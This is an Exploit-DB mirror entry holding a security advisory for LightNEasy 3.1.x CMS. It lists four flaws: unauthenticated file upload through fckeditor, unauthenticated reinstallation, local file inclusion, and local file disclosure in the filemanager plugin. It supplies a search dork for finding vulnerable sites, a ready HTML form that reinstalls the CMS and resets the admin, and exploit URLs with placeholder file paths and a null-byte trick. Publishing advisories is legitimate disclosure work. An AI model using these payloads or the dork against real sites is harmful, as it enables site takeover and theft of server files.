exploit-db-mirror/exploits/php/webapps/12322.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

66 lines
No EOL
3.5 KiB
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

##############################################################################
#Title: LightNEasy 3.1.x Multiple Vulnerabilites #
#Vendor: http://lightneasy.org/ #
#Dork: "Powered by LightNEasy" #
##############################################################################
#AUTHOR: ITSecTeam #
#Email: Bug@ITSecTeam.com #
#Website: http://www.itsecteam.com #
#Forum : http://forum.ITSecTeam.com #
#Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability46.htm #
#Thanks: r3dm0v3 [r3dm0v3_at_ymail.com] #
##############################################################################
#DESCRIPTION (by vendor):#####################################################
LightNEasy, a simple and light Content Management System and Website Builder
#1-fckeditor Remote File Upload###############################################
#Desc:
Remote users can upload file without authentication.
#POC:
http://site.com/fckeditor/editor/filemanager/connectors/test.html
#2-Reinstallation#############################################################
#Desc:
After software installation it is still possible for remote users to reinstall
the software without authentication.
#Exploit:
<html>
<form name="form1" action="http://site.com/LightNEasy/install1.php" method="post"><table>
<tr><td>Enter password:</td><td><input type="password" name="password" value="" /></td></tr>
<tr><td>Repeat password:</td><td><input type="password" name="password1" value="" /></td></tr>
<tr><td>Admin name:</td><td><input type="text" name="admin" value="" /></td></tr>
<tr><td>Admin email:</td><td><input type="text" name="email" value="" /></td></tr>
<tr><td>Website email:</td><td><input type="text" name="wemail" value="" /></td></tr>
<tr><td>Tables prefix:</td><td><input type="text" name="prefix" value="LNE_" /></td></tr>
<tr><td>Database system:</td><td><select name="database" ><option value="SQLite2">SQLite 2 (following fields empty)</option><option value="SQLite3">SQLite 3 (following fields empty)</option><option value="MySQL">MySQL</option></select></td></tr>
<tr><td>Database name:</td><td><input type="text" name="databasename" value="" /></td></tr>
<tr><td>MySQL login:</td><td><input type="text" name="databaselogin" value="" /></td></tr>
<tr><td>MySQL password:</td><td><input type="text" name="databasepassword" value="" /></td></tr>
<tr><td>MySQL host:</td><td><input type="text" name="databasehost" value="" /></td></tr>
<tr><td> </td><td><input type="submit" name="submit" value="Create Database" /></td></tr>
</table></form>
</html>
#3-Filemanager plugin Local File Inclusion####################################
#Bug-file: /plugins/filemanager/get_file.php
29: if(!isset($language)) $language = 'en';
30: include("languages/lang_$language.inc"); //<---- vulnerable line!
#Exploit:
http://site.com/plugins/filemanager/get_file.php?language=[file_to_include]%00
#4-Filemanager plugin Local File Disclosure###################################
#Bug-File:
14: if(isset($_REQUEST['file'])) $file = $_REQUEST['file'];
...
56: readfile($file);
#EXPLOIT:
http://site.com/plugins/filemanager/get_file.php?file=[file_to_read]